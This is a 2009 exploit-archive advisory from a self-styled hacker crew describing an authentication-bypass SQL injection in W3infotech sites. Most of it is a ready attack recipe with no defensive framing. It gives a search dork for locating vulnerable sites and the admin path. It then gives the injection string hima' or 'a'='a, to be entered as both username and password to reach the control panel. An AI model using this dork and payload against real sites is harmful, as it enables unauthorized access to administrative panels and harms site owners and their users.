[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : W3infotech ( Auth Bypass ) SQL Injection Vulnerability
# Published : 2009-11-24
# Author : ViRuS_HiMa
# Previous Title : PointComma <= 3.8b2 Remote File Inclusion Vulnerability
# Next Title : Quick.Cart 3.4 and Quick.CMS 2.4 CSRF Vulnerabilities


[*]##############################################  
[+] |____ViRuS_HiMa@YouR SyS__|__              #
[+] |______________________|___||*___          #
[+] |______________________|___||""|"*___,     #
[+] |______________________|___||""|*"|___||    #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)*     #
[+]====================================================================||
[*] About    : W3infotech ( Auth Bypass ) SQL injection Vulnerability  ||
[!] Site     : http://www.w3infotech.com                               ||
[!] Author   : ViRuS_HiMa                                              ||
[!] Site     : wWw.HeLL-z0ne.org                                       ||                                             
[!] E-Mail   : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM                     ||
[!] Location : Cairo-007                                               ||
[!]====================================================================||
[!]                  [H]eL[L] [Z]on[E] [C]re[W]                        ||
[!]====================================================================||
[!]
[!] Exploitation :                                                     ||
[!]
[!]    you can use this dork :  "Powered By W3infotech"                ||
[!]
[!]    Just add the admin path ,, so it will be :                      ||
[!]    
[!]    http://server/admin                                             ||    
[!]
[!]    then auth bypass using this password :                          ||
[!]
[!]    hima' or 'a'='a                                                 ||
[!]
[!]    it mean that you have to type the same code in user and pass    ||
[!]
[!]    what you got ?? ,, you are in the script control panel now :p   ||
[!]                                                               
[!]====================================================================||
[!] Greetz : Haxker & explit007 & Kasper-Ksa & All My Friends .         ||
[*]====================================================================||